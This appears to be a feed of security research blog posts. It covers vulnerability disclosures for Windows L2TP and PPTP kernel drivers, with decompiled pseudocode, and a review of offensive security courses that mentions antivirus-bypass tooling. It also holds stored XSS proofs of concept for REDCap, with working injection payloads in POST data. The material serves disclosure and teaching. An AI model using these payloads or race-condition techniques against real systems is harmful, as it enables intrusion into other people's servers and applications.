https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211

L2TP is a relatively uncommonly used protocol and sits behind an IPSEC authenticated tunnel by default, making the chances of seeing this bug in the wild extremely low. Despite the low likelihood of exploitation, analysis of this bug demonstrates interesting adverse effects of code which was designed to actually mitigate security risk.

L2TP and IPSEC

The default way to interact with an L2TP VPN on Windows Server is by first establishing an IPSEC tunnel to encrypt the traffic. For the purposes of providing a minimalistic proof of concept, I tested against Windows Server with the IPSEC tunnelling layer disabled, interacting directly with the L2TP driver. Please note however, it is still possible to trigger this bug over an IPSEC tunnelled connection.

For curious readers, disabling IPSEC can be achieved by setting the ProhibitIpSec DWORD registry key with a value of 1 under the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\

This will disable IPSEC tunnelling and allow L2TP to be interacted with directly over UDP. Not to discourage a full IPSEC + L2TP solution, but it does make testing the L2TP driver a great deal easier!

Vulnerability Details

The bug in question is a reference increment bug located in the rasl2tp.sys L2TP VPN protocol driver, and relates to how tunnel context structures are reused. Each established tunnel for a connection is allocated a context structure, and a unique tunnel is considered to be the pairing of both a unique tunnel ID and UDP + IP address.

When a client initiates an L2TP StartControlConnectionRequest for a tunnel ID that they have previously used on a source IP and port that the server has already seen, the rasl2tp driver will attempt to reuse a previously allocated structure as long as it is not in an unusable state or already freed. This functionality is handled by the SetupTunnel function when a StartControlConnectionRequest is made with no tunnel or session ID specified in the L2TP Header, and an assigned tunnel ID matching one that has already been used.

Pseudo code for the vulnerable section is as follows:

if ( !lpL2tpHeaderHasTunnelID )
{
   // Tunnel Lookup function uses UDP address information as well as TunnelID to match a previous Tunnel Context structure
   NewTunnel = TunnelCbFromIpAddressAndAssignedTunnelId(lpAdapterCtx, lpSockAddr, lpTunnelId);
   if ( NewTunnel ) // if a match is found a pointer is returned else the return is NULL
   {
      if...
      ReferenceTunnel(NewTunnel, 1); // This is the vulnerable reference count
      KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
      return NewTunnel;
   }
}

The issue is that the reference count does not have an appropriate dereference anywhere in the code. This means that it is possible for a malicious client to continually send StartControlConnectionRequests to increment the value indefinitely.

This creates two separate vulnerable conditions. Firstly, because the reference count can be far greater than it should be, it is possible for an attacker to abuse the issue to exhaust the memory resources of the server by spoofing numerous IP address and tunnel ID combinations and sending several StartControlConnectionRequests. This would keep the structures alive indefinitely until the server’s resources are exhausted, causing a denial of service. This process can be amplified across many nodes to accelerate the process of consuming server resources and is only limited by the bandwidth capacity of the server. In reality, this process may also be limited by other factors applied to network traffic before the L2TP protocol is handled.

The second vulnerable condition is due to logic in the DereferenceTunnel function responsible for removing tunnel references and initiating the underlying free operation. It is possible to turn this issue into a Use after Free (UaF) vulnerability, which could potentially then be used to achieve Remote Code Execution.

Some pseudo code for the logic that allows this to happen in the DereferenceTunnel function is as follows:

__int64 __fastcall DereferenceTunnel(TunnelCtx *TunnelCtx)
{
   ...

   lpAdapterCtx = TunnelCtx->AdapterCtx;
   lpTunnelCtx = TunnelCtx;
   lpAdapterCtx->TunnelCurIRQL = KeAcquireSpinLockRaiseToDpc(&lpAdapterCtx->TunnelLock);
   RefCount = --lpTunnelCtx->TuneelRefCount;
   if ( !RefCount )
   {
      // This code path properly removes the Tunnel Context from a global linked list and handles state termination
      ...
   }
   KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
   if ( RefCount > 0 ) // This line is vulnerable to a signed integer overflow
      return (unsigned int)RefCount;
   ...
   lpTunnelCtx->TunnelTag = '0T2L';
   ExFreePoolWithTag(&lpTunnelCtx[-1].TunnelVcListIRQL, 0);
   ...
   return 0i64;
}

The second check of the reference count that would normally cause the function to return uses a signed integer for the reference count variable. This means using the reference increment bug we can cause the reference count value to overflow and become a negative number. This would cause the DereferenceTunnel function to free the target tunnel context structure without removing it from the global linked list.

The global linked list in question is used to store all the active tunnel context structures. When a UDP packet is handled, this global linked list is used to lookup the appropriate tunnel structure. If a freed structure was still present in the list, any UDP packet referencing the freed context structure’s ID would be able to gain access to the freed structure and could be used to further corrupt kernel memory.

Exploitation

Exploitation of this bug outside of just exhausting the memory resources of a target server could take a very long time and I suspect would not realistically be exploitable or viable. Since a reference count can only happen once per UDP packet and each UDP message has to be large enough to contain all prior network stack frames and the required L2TP (and IPSEC) messages, the total required throughput is huge and would almost definitely be detected as a denial of service (DoS) attack long before reaching the required reference count.

Conclusion

This leaves the question of why would a developer allow a reference count to be handled in this way, when it should only ever require a minimum value of 0?

The main reason for allowing a reference count to become a negative number is to account or check for code that over removes references, and would typically result in an unsigned overflow. This kind of programming is a way of mitigating the risk posed by the more likely situation that a reference count is over-decremented. However, a direct result is that the opposite situation then becomes much more exploitable and in this scenario results in a potential for remote code execution (RCE).

Despite this, the mitigation is still generally effective, and the precursors for exploitation of this issue are unlikely to be realistically exploitable. In a way, the intended mitigation works because even though the maximum possible impact is far greater, the likelihood of exploitation is far lower.

Timeline

  • Vulnerability Reported To Microsoft – 20 April 2022
  • Vulnerability Acknowledged – 20 April 2022
  • Patch In Development – 23 June 2022
  • Patch Released – 12 July 2022

The post CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability appeared first on Nettitude Labs.

Offensive Security: From OSCE to OSCE3

8 August 2022 at 16:16

OSCE3 (Offensive Security Certified Expert 3) is a certification from Offensive Security which has replaced the (now retired) OSCE certification. This post explores a pentester’s journey from being OSCE certified to becoming OSCE3 certified.

Way back in the halcyon year of 2012, I received the OSCE certification from Offensive Security. At the time, it was regarded as one of the more difficult to obtain certifications and required an in-depth knowledge of several deep technical subjects. These included advanced (at the time) web application hacking, advanced (at the time) shellcoding skills, and advanced (at the time) fuzzing and exploit creation skills.

Upon obtaining the OSCE certification, it was quite easy to show that one had a myriad of skills in the security world and would be able to pentest, or at least be able to hack their way out of a paper bag. However, the security world marches on, and techniques become obsolete or outdated – or in this case, both. What was once considered cutting edge generalist training became a shadow of its former self.

Introducing: Offensive Security Certified Expert 3 (OSCE3)

Fortunately, Offensive Security was aware of this, and recently revamped the OSCE training and certification into far more in-depth and relevant courses. It was split into three separate trainings: Advanced Web Attacks and Exploitation, which has the OSWE certificate, Evasion Techniques and Breaching Defenses, which has the OSEP certificate, and Windows User Mode Exploit Development, which has the OSED certificate. Obtaining all three would give the OSCE3 certificate, which is the new and improved version of the OSCE that I had originally obtained.

I decided that I was going to update my certification status. I was interested both in the advanced training that was offered, and in seeing if all of the security experience I had gained in the meantime made it relevant for me to obtain. Meaning, yeah, I would get some shiny letters, but would it actually up my game? With that in mind, I jumped into the training, eventually receiving all three of the certifications and obtaining my OSCE3, with the final certificate earned 11 months after my first was earned.

What follows is my review of the three courses, with a particular eye towards their relevancy to those who have already been pentesters for a while.

Offensive Security Web Expert (OSWE/WEB-300)

Advanced Web Attacks and Exploitation (referred to as AWAE or WEB-300) is an advanced web attack course that replaces the (admittedly minor) web portion of OSCE. Those who complete the course and pass the exam earn the Offensive Security Web Expert (OSWE) certification. While both courses dealt with reading the source code of a web application and finding a vulnerability, the OSCE version seemed more of an afterthought than a core part of the course. AWAE is designed to change all of that, bringing in a fully fleshed-out course dealing with code review and exploit creation on the web.

And, oh boy, does it ever! There are some basic topics that are taken much further, like XSS and SQL injection. Every tester should know how to exploit them, but the course helps bring more interesting payloads and shift direction on basic exploitation to kick it up a notch. While everyone can drop a BeEF payload and hope it works, or fake a password form for XSS, there is so much more to do, and the content really helps bring that mindset across. Application specific payloads are the norm, and while the exact use cases are not going to be as easily replicated as the studies in the labs, the mindset shift of “Let’s put in the password form in the XSS field” to “What is the most impactful action we can take on the application, and how can I code the payload to do it?” is a fantastic step forward.

And that’s not even the best part. The best part of the AWAE course, where it truly shines? The more niche and unique topics. Deserialization, SSRF, CORS, and more are all explained *thoroughly*. Where perhaps in other courses the explanation was too much, in this one, there is just enough to get all of the nuances across without overloading with useless information.

The proofs of concept are also fantastic. Some of them are contrived, like the CORS payloads, in order to prove the point, but the vast majority of them are works of art explaining how to comprehensively exploit an application. The code created in the course is generally portable and adaptable, so once created, the proof of concept can work for you forever. That’s service.

Of the modules in the material, I think I enjoyed the deserialization the most. Before AWAE, while I could scan and potentially exploit these issues, there were definitely parts I did not understand. However, with the thorough, step by step explanations in the course, every mystery was laid to rest, and it became second nature. In fact, in a live engagement during the course, I was able to pull down an executable from Citrix via a breakout exploit. Upon examining the code, I found an unsafe deserialization in how it handled clipboard data. Several hours of Googling to find a program to edit the hex values and attributes of clipboard data later, I had a simple copy/paste payload that would trigger a shell on the Citrix server. I’ll be honest, before the course, I likely would not have been able to craft that payload, and would have left exploitation as an exercise to the reader.

There are three challenge labs in AWAE, each of which highlights various portions of the course. However, I took the course before the labs were released, so I do not have comments on them. From my activity on the forums and OffSec Discord, I hear good things.

I will hold my comments on the format of the exam, other than to say that of all the OffSec exams, it felt the most real world. At no point did I feel that an obstacle was artificial, and all were overcome the way I would have done it in a live pentest.

There are, of course, some areas where I felt the AWAE course could do with further development. At times it was hard to follow along in the PDF and videos, and making changes to code to add the next step in the PoC scripts can be awkward. Sometimes, that requires moving to the forums or discord to be told that there was a minor error in the code, which can get frustrating at times. Connectivity to the apps can also be an issue, with certain requests hanging because of the VPN or the like. While they exist, they do not lower the quality of the learning.

The real-world value of this course, even for an experienced tester is fantastic. Deeper understanding, better payloads, faster outcomes, and more. This is definitely a course to take to up your game to the next level.

Offensive Security Experienced Penetration Tester (OSEP/PEN-300)

Geared as an advanced infrastructure course, OSEP aims to replace the second leg of the tripod that was OSCE and its materials. The core it seeks to replace was the very spindly leg of creating code-caves and custom XOR encoding schemes.

At its core, OSEP teaches Active Directory fundamentals, antivirus evasion, and lateral movement techniques that are seen everywhere today – and I would say it does an excellent job.

Each module can be characterized by the following path: A technique is discussed, broken down to its individual parts of how and, much more importantly, *WHY* it works, and then implemented. This breakdown is fantastic in all 17 of the modules in the course. At times, the breakdown of the Why is not as important as the How, especially given that, sometimes, a few sentences past a long-winded explanation of Why, we are told to use another tool that does it all for us silently. Even so, walking away with more fundamental knowledge is what allows us to grow as pentesters, and is not something to give away. In the end, each student will have to decide on their own if the Why is as important to them as the How. My advice? It is. Spend time understanding and digesting the Why and doing the extra miles in order to gain the most out of the course.

Certain modules delved into tremendous depth in niche cases that were not necessarily relevant, such as Linux breakouts, or were quick on things that may have benefited from more time on it, such as proxying and domain fronting. While the former could have been better served with a Citrix breakout instead of Linux, in the end it was a fascinating module, and I would not want it changed – perhaps expanded to include RDWeb and Citrix, but certainly not reduced. The domain fronting content is relatively short due to technical limitations and new security measures in the usual domain fronting services, so I understand why it was not so long. But even so, perhaps another, more intense lab would have helped drive home the concepts.

In terms of real-world value, there is no substitution for the OSEP course. Even during studying I was immediately able to put techniques learned into practice, including getting Domain Administrator privileges on two domains that were previously uncracked, using lateral movement techniques, and assisting a colleague with a CLM and AppLocker bypass. Combining the tools with the advanced AV evasion techniques meant that I had a fully homegrown tool that can bypass AV, AMSI, PowerShell CLM, and AppLocker – even on a fully patched and protected modern OS. The satisfaction of watching a command shell with no restriction pop up when a co-worker swears it cannot be done is not to be understated – it’s awesome.

This tool is shown below, which hijacks a thread of notepad and runs a reverse shell (not shown). I take no credit for any of the research – I merely ported some sections of C++ to C# and combined several techniques into one.

The was created to be nothing more than a showcase of various techniques, and is overkill for actual use. If used in the wild, I recommend the following: Don’t. If you must, then choose a single technique and work with that. The tool pictured above works to bypass everything, but is completely unnecessary and not good for any stealth or long-term AV bypass.

Of the course tracks, I’m torn between enjoying lateral movement or AV evasion more. In theory, lateral movement is fun, but limited in practice in the real world, where domains are so often hacked with Responder or Kerberoasting or other “single step to DA” techniques. In practice, AV evasion is a never-ending cat and mouse cycle that consistently allows us to up our game and create better tools. On the whole, I would probably say AV evasion helped up my tooling and coding game the most. See below for a real-world screenshot of me avoiding AV.

In Terminator 2, Robert Patrick improvises the moment when the T-1000 walks through the bars at the jail. The door was supposed to be open but the actor surprised the cast and

The course also has six challenge labs of varying difficulty in order to refine tools and techniques. They are genuinely fantastic and I wish there were more. The challenges each took a few hours to complete, even challenge one, where I went down so many rabbit holes that Alice would be ashamed of me. The general sense was that each challenge took about 4-6 hours, and if there was any point that I was stuck, I had the forums and discord to help me out. Once done, I used the extra time in the labs to refine my tooling, until I had a fully AV+CLM+AMSI+Applocker bypassing version of each shellcode runner (doc, exe, js, vbs, hta, etc), process injection, process hollowing, and other tools that were created in the course of the modules. This came in very handy in exam time when I didn’t need to worry about any protections in place, confident that what I had written would fly invisible and under the radar.

I will withhold my comments about the exam, only saying that it mimics the real world more than the labs, and sometimes the people who create networks make exactly the errors you would think they do.

As far as areas for development with the OSEP course, I would say the main one would be the reliability of labs. Sometime, techniques that worked perfectly a few minutes ago would fail and require a revert. Other times, services would not be available or accessible as necessary, requiring the labs to be reverted 5-6 times. Additionally, some techniques in the course overlook tools that are in every internal infrastructure hacker’s arsenal, in favor of out of date or obsolete versions.

All things considered though, PEN-300 was a fantastic course with immediate returns in my day-to-day pentesting, and I highly recommend it for a more in-depth understand of attack chains and tooling. Do yourself a favor and buy the course.

Offensive Security Exploit Developer (OSED/EXP-301)

The final course in the OSCE3 triad, Windows User Mode Exploit Development (referred to as EXP-301), is the replacement of the main attraction of OSCE. Where the old Cracking the Perimeter (CTP) course shone was in its exploitation and shellcoding portions. EXP-301 takes that and turns it up to 11. It just goes *hard*.

Back in the CTP days, mitigations like ASLR were covered in the course, but in a contrived minor way to show the possibility of a bypass, and DEP wasn’t covered at all. That is not the case anymore. Each of these topics is dealt with in absurd depth. Multiple times. In multiple ways. Once the inner workings of the protections are explained, it’s a very short time before the student is happily crafting leaks and ROP chains. But that’s not all.

but wait, there's more! - But wait There's more

There are two more areas where the course shines – reverse engineering and shellcoding. Let’s take them one by one. Reverse engineering is a complex topic – there are multiple ways to go about it, and the course choses to focus on static reversing with IDA coupled with dynamic with WinDbg. And it works. Complex programs are taken apart in a way that is easily digestible and understood by the student. Students have to go the extra mile with reverse engineering on multiple occasions, but all challenges are doable, if slightly difficult at times. The knowledge of how to work with those two imposing programs is a huge plus of the course, since it takes these two behemoths and demystifies them for common use. Taking apart programs is fun, and really makes me appreciate .NET and DNSpy for my usual day to day.

The shellcoding aspect of the course is likewise a well-done portion. The reverse shell that is created and optimized is perfectly usable in the real world. And the techniques are also easily portable to the real world, as I found to my glee when I needed some quick shellcode to drop in an engagement. Plus, understanding how and why things are done the way they are helps with changing MSF shellcode or others. Inline ASM in C is likewise turned into a cinch, once the knowledge is there.

The course also covers format strings, but since those attacks are more or less disappearing, I won’t spend too much time on them other than to say that using a format string to leak an address is lots of fun.

All of these things, reverse engineering and ALSR bypass and DEP bypass and stack overflows and SEH overflows and shellcode creation and format strings, are practiced on this one program that just has every vulnerability ever. But it does mean that the student has the ability to truly understand and even take it further to find their own vulnerabilities in the exe, so I am counting that as a plus.

The area of the course I enjoyed the most would likely be module 10, where we combined ASLR and DEP bypasses in a single exploit.

The joy of seeing a reverse shell pop after fully reverse engineering and crafting an exploit all by yourself on an extra mile cannot be overstated. I don’t think I have ever felt more like a hacker than when a ROP chain 80 gadgets long that I crafted using sublime text and no debugger, popped me a shell on the first try with no errors.

There are multiple ways to do everything, so an additional challenge to yourself is possible by shifting the bypass method from the one outlined in the course to one of your own choosing, and is a great way to practice.

There are three challenges in the course. They all touch on various aspects of the course, but do not really overlap much. I personally only did challenges one and two, not getting a full shell with challenge three before I passed the exam. However, challenges one and two were loads of fun. I do believe they are necessary, and I definitely think that all of the extra miles in this course are needed to be able to pass the exam.

I won’t say much about the exam, however I will say that it was a significantly difficult endeavor. Do not get discouraged by the goals, as there are many ways to do things. Also, my solutions were not the intended solutions and saved me a huge amount of effort, so there are different ways to do things.

However, there are some fairly glaring omissions from the course – x86 is not going to be the average user’s architecture, and creating exploits for it seems like a tee-ball league version of hacking versus true major league hacking. Also, so much of the course feels like a blueprint was given for the concepts, and then we are pushed into the deep end. The exam certainly felt like that, but it *is* the exam, so it’s understandable. In terms of real-world value, this is hard to say. The course is fantastic, but x86 is not really used any more – so for practical exploitation, use this course as a jumping point to x64. However, if your aim is to understand concepts and put them to use in other areas of the hacking world, this is a fantastic jump point into these kinds of topics. All in all, I would say the course is worth taking.

Conclusion

After having taken all three of the replacement courses, I came to the conclusion that upgrading the certificate was definitely a great idea. I learned a huge amount in each area and put it to use almost immediately in all cases. I would encourage even experienced testers to go ahead and grab the training.

I would say that for OffSec, there are effectively two things here, the training and the certificate. Even if you should choose not to take the exam, the course itself is extremely high value and you won’t walk away feeling like you are missing out. If it’s not an option to take all three courses, then choose the one most relevant to your day-to-day testing and get on it. They are all excellent, and worth the effort of Trying Harder.

Also, the challenge coin for OSCE3 is pretty sweet, so that’s a fun goal to go for. In the end, I feel like taking the courses made me a better pentester in all of the areas covered.

The post Offensive Security: From OSCE to OSCE3 appeared first on Nettitude Labs.

CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting

15 June 2022 at 09:00

Nettitude identified two stored Cross Site Scripting (XSS) vulnerabilities within Vanderbilt REDCap.  These have been assigned CVE-2022-24004 & CVE-2022-24127.

REDCap is a web application which allows the creation and management of online surveys for research purposes. Version 12.0.11 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the Messenger functionality and the administration interface.

CVE-2022-24004 – Proof of Concept

REDCap has a built in messenger function which allows all registered users to communicate within the application. Each conversation created has a title which can only be edited by the user which originally created the conversation. The input field where this title can be edited does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST data sent to Messenger_ajax.php:

action=change-conversationtitle&amp;thread_id=7&amp;new_title=%22+onclick%3Dalert(document.location)+&amp;username=m17664jp&amp;limit=8&amp;redcap_csrf_token=1c5c586a0e3d614dfba3401a1dd92f508d4f915a

This payload will then trigger in the browser where the messenger sidebar is toggled of any user which is a participant of the conversation. The following screenshot shows that the payload is injected into the data-tooltip parameter of the h4 tag.

For this simple proof of concept, the user would have to click on the message title, resulting in the execution of a JavaScript alert.

Graphical user interface, application Description automatically generated

The impact of this vulnerability could lead to the disclosure of sensitive application and survey data. Given that the messenger functionality will autocomplete usernames after providing the first character, it is possible to see how an attacker could create a conversation with all application users to maximise chances of compromising application data from an administrator user.

Nettitude demonstrated the impact of this to the application vendor by further improving the proof of concept to automatically trigger on page load and scrape the contents of the users screen, sending this data to a remote server.

CVE-2022-24004 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: Messenger_ajax.php
  • Vulnerable parameter: new_title

CVE-2022-24127 – Proof of Concept

In the project administration section of the application, admin users that have permissions to modify a project can modify the project title. The input field where this value is modified does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST Data sent to edit_project_settings.php:

surveys_enabled=1&repeatforms=0&scheduling=0&randomization=0&app_title=a%3C%2Ftitle%3E%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&purpose=0&project_pi_firstname=&project_pi_mi=&project_pi_lastname=&project_pi_email=&project_pi_alias=&project_irb_number=&purpose_other=&project_note=test&projecttype=on&repeatforms_chk=on&redcap_csrf_token=9158988d73045f982cb373f607a607022391e1df

Once the project title is modified, the user is returned to the project administration home page where the payload immediately triggers and will continue to be executed across all administration pages related to the project.

Text Description automatically generated

This code execution is triggered due to the project title being reflected in the page <title> tag. If a user enters a value which first closes the tag, then any further HTML or JavaScript can be executed as shown in the following screenshot.

Graphical user interface, text, application, email Description automatically generated

The impact this vulnerability is reduced because it would require the attacker to have existing access as a user with project administration permissions. An attacker could potentially exploit this issue to redirect the user to a malicious website controlled by the attacker, which may ultimately lead to credential harvesting or the downloading of malware.

CVE-2022-24127 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: edit_project_settings.php
  • Vulnerable parameter: app_title

Conclusion

All areas of a web application which accept and store user input should not be trusted.  Appropriate measures should be taken to sanitize or encode data before being shown in a later browser response.

Nettitude contacted Vanderbilt to disclose these vulnerabilities. Remediation was put in place almost immediately post-disclosure and a remediated version (12.0.13) was promptly released.

A picture containing text Description automatically generated

Timeline – CVE-2022-24004

  1. Discovered by Nettitude: 25 January 2022
  2. Vendor informed: 26 January 2022
  3. CVE Assigned: 26 January 2022
  4. Vendor fix released: 28 January 2022
  5. Nettitude Blog: 15 June 2022

Timeline – CVE-2022-24127

  1. Discovered by Nettitude: 28 January 2022
  2. Vendor informed: 28 January 2022
  3. Vendor fix released: 28 January 2022
  4. CVE assigned: 29 January 2022
  5. Nettitude Blog: 15 June 2022

 

The post CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting appeared first on Nettitude Labs.

CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2)

11 May 2022 at 09:00

Following yesterday’s Microsoft VPN vulnerability, today we’re presenting CVE-2022-23270, which is another windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering and fuzzing the raspptp.sys kernel driver. This presents attackers with another chance to perform denial of service and potentially even achieve remote code execution against a target server.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 Respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

The vulnerability affects both server and client use cases of the raspptp.sys driver and can potentially be triggered in both cases. This blog post will focus on triggering the vulnerability against a server target.

Introduction

CVE-2022-23270 is heavily dependent on the implementation of the winsock Kernel (WSK) layer in raspptp.sys, to be successfully triggered. If you want to learn more about the internals of raspptp.sys and how it interacts with WSK, we suggest you read our write up for CVE-2022-21972 before continuing:

CVE-2022-23270 is a Use after Free (UaF) resulting in Double Free that occurs as the result of a race condition. It resides in the implementation of PPTP Calls in the raspptp.sys driver.

PPTP implements two sockets; a TCP control connection and a GRE data connection. Calls are setup and managed by the control connection and are used to identify individual data streams handled by the GRE connection. The Call functionality makes it easy for PPTP to multiplex multiple different streams of VPN data over one connection.

Now we know in simple terms what PPTP calls are, lets see how they can be broken!

The Vulnerability

This section explores the underlying vulnerability.  We will then move on to triggering the vulnerable code on the target.

PPTP Call Context Objects

PPTP calls can be created through an IncomingCallRequest or an OutgoingCallRequest control message. The raspptp.sys driver creates a call context structure when either of these call requests are initiated by a connected PPTP client. The call context structures are designed to be used for tracking information and buffering GRE data for a call connection. For this vulnerability construction of the objects by raspptp.sys is unimportant we instead care about how they are accessed.

Accessing the Call Context

There are two ways in which handling a PPTP control message can retrieve a call context structure. Both methods require the client to know the associated call ID for the call context structure. This ID is randomly generated by the server sent to the client within the reply to the Incoming or Outgoing call request. The client then uses that ID in all subsequent control messages sent to the server that relate to that specific call. See the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637) for more information on how this is handled.

raspptp.sys uses two methods to access the call context structures when parsing control messages:

  • Globally accessible Call ID indexed array.
  • PPTP control connection context stored link list.

The difference between these two access methods is scope. The global array can retrieve any call allocated by any control connection, but the linked list only contains calls relating to the control connection containing it.

Let’s go a bit deeper into these access methods and see if they play nicely together…

Linked List Access

The linked list access method is performed through two functions within raspptp.sys. EnumListEntry which is used to iterate through each member of the control connection call linked list and EnumComplete which is used to end the current loop and reset state.

while ( 1 )
{
    EnumRecord = EnumListEntry(
    &lpPptpCtlCx->CtlCallDoubleLinkedList,
    (LIST_ENTRY *)&ListIterator,
    &lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);
    if ( !EnumRecord )
        break;
    EnumCallCtx = (CtlCall *)(EnumRecord - 2);
    if ( EnumRecord != (PVOID *)16 && EnumCallCtx->CallAllocTag == 'CPTP' )
        CallEventOutboundTunnelEstablished(EnumCallCtx);
}
Itreator = (LIST_ENTRY *)&ListIterator;
EnumComplete(Itreator, (KSPIN_LOCK)&lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);

The ListIterator variable is used to store the current linked list entry that has been reached in the list so that the loop can continue from this point on the next call to EnumListEntry. EnumComplete simply resets the ListIterator variable once it’s done with. The way in which this code appears in the raspptp.sys driver can change around slightly but the overall method is the same. Call EnumListEntry repeatedly until it returns null and then call EnumComplete to tidy up the iterator.

Global Call Array

The global array access method is handled through a function called CallGetCall:

CtlCall *__fastcall CallGetCall(PptpAdapterContext *AdapterCtx, unsigned __int64 CallId)
{
    PptpAdapterContext *lpAdapterCtx;
    unsigned __int64 lpCallId;
    CtlCall *CallEntry;
    KIRQL curAdaperIRQL;
    unsigned __int64 BaseCallID;
    unsigned __int64 CallIdMaskApplied;

    lpAdapterCtx = AdapterCtx;
    lpCallId = CallId;
    CallEntry = 0i64;
    curAdaperIRQL = KeAcquireSpinLockRaiseToDpc(&AdapterCtx->PptpAdapterSpinLock);
    BaseCallID = (unsigned int)PptpBaseCallId;
    lpAdapterCtx->HandlerIRQL = curAdaperIRQL;
    if ( lpCallId >= BaseCallID && lpCallId < (unsigned int)PptpMaxCallId )
    {
        if ( PptpCallIdMaskSet )
        {
            CallIdMaskApplied = (unsigned int)lpCallId & PptpCallIdMask;
            if ( CallIdMaskApplied < (unsigned int)PptpWanEndpoints )
            {
                CallEntry = lpAdapterCtx->PptpWanEndpointsArray + CallIdMaskApplied;
                if ( CallEntry )
                    {
                        if ( CallEntry->PptpWanEndpointFullCallId != lpCallId )
                            CallEntry = 0i64;
                    }
            }
        }
        else
        {
            CallEntry = lpAdapterCtx->PptpWanEndpointsArray + lpCallId - BaseCallID;
        }
    }
KeReleaseSpinLock(&lpAdapterCtx->PptpAdapterSpinLock, curAdaperIRQL);
return CallEntry;
}

This function effectively just retrieves the array slot that the call context structure should be stored in based on the provided call ID. It then returns the structure at that entry provided that it matches the specified ID and is in fact a valid entry.

So, what’s the issue? Both of these access methods look pretty harmless, right? There is one subtle and simple issue in the way these access methods are used. Locking!

Cross Thread Access?

CallGetCall is intended to be able to retrieve any call allocated by any currently connected control connection. Since a control connection doesn’t care about other control connection owned calls the control connection state machine should have no use for CallGetCall or at least, according to the PPTP RFC, it shouldn’t. However, this isn’t the case there are several control connection methods in raspptp.sys that use CallGetCall instead of referencing the internal control connection linked list!

If CallGetCall lets us access other control connection call context structures and certain parts of the PPTP handling can occur concurrently, then we can theoretically access the same call context structure in two different threads at the same time! This is starting to sound like a recipe for some racy memory corruption conditions.

Lock and Roll

Both the linked list access method and the CallGetCall function reference a PptpAdapterSpinLock variable on a global context structure. This is a globally accessible kernel spin lock that is to be used to prevent concurrent access to things which can be accessed globally. Using this should make any concurrent use of either call context list access method safe, right?

This isn’t the case at all. Looking at the above pseudo code the lock in CallGetCall is only actually held when we are searching through the list, which is great for the lookup but it’s not held once the call structure is returned. Unless the caller re locks the global lock before using the context structure (spoiler alert, it does not) then we have a potential window for unsafe concurrent access.

Concurrent access doesn’t necessarily mean we have a vulnerability. To prove that we have a vulnerability, we need two code locations that could cause a further issue when running with access to the object at the same time. For example, any form of free operation performed on the structure in this scenario could be a good source of an exploitable issue.

Getting Memory Corruption

Within the raspptp.sys driver there are many places where the kind of access we’re looking for can occur and cause different kinds of issues. Going over all of them is probably an entire series worth of blog posts that we can’t imagine anyone really wants. The one we ended up using for the Proof of Concept (PoC) involves the following two operations:

  • Closing A Control Connection
    • When a control connection is closed the control connections call linked list is walked and each call context structure is appropriately de-initialised and freed. This operation is performed by a familiar function, CtlpCleanup.
  • Sending an OutgoingCallReply control message with an error code set
    • If an OutgoingCallReply message is sent with an error set the call structure that it relates to is freed. The CallGetCall function is used for looking up the call context structure in this control message handling, which means we can use it to perform the free while the control connection close routine is running in a separate thread.

These two conditions create a scenario where if both were to happen consecutively, a call context structure is freed twice, causing a Use after Free/Double Free issue!

Race Against the Machine!

To trigger the race we need to take the following high level steps:

  • Create two control connections and initialise them so we can create calls.
  • On the first connection, we create the maximum allowed number of calls the server will allow us to.
  • We then consecutively close the first connection and start sending OutGoingCallReply messages for the allocated call IDs.
    • This realistically needs to be done in separate threads bound to separate CPU cores to guarantee true concurrency.
  • Then we sit back and wait for the race to be won?

In practice, reliably implementing these steps is a lot more difficult than it would initially seem. The window for reliably triggering the race condition and the amount of time we have to do something useful once the initial free occurs is incredibly small, even in the best case scenario.

However, this does not mean that it cannot be achieved. With a significant amount of effort it is possible to greatly increase the reliability of triggering the vulnerability. There are many different factors that can be played with to build a path towards successful exploitation.

One Lock, Two Lock, Three Lock, Four!

Let’s take a look at the two bits of code we’re hoping to get perfectly aligned and see just how tricky this race condition is actually going to be.

The CtlpCleanup Linked List Iteration

for ( ListIterator = (LIST_ENTRY *)EnumListEntry(
    &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
    &iteratorState,
    &gAdapter->PptpAdapterSpinLock);
    ListIterator;
    ListIterator = (LIST_ENTRY *)EnumListEntry(
    &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
    &iteratorState,
    &lpCtlCtxToCleanup->pPptpAdapterCtx->PptpAdapterSpinLock) )
    {
        lpCallCtx = (CtlCall *)&ListIterator[-1];
        if ( ListIterator != (LIST_ENTRY *)16 && lpCallCtx->CallAllocTag == 'CPTP' )
        {
            ...
        CallCleanup(lpCallCtx); // this will eventually free the call strructure
    }
}

We can see here that the loop is fairly small. The main part that we are interested in is the call to CallCleanup that is performed on each Call structure in the control context linked list. Now unfortunately this function is not as simple as we would like. The function contains a large number of different paths to execute and could potentially have a variety of ways that make our race condition harder or easier to exploit. The section that is most interesting for us in our PoC is the following pseudo code snippet.

lpIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
lpCallToClean->NdisVcHandle = 0i64;
lpCallToClean->CurIRQL = lpIRQL;
CallDetachFromAdapter(lpCallToClean);
KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
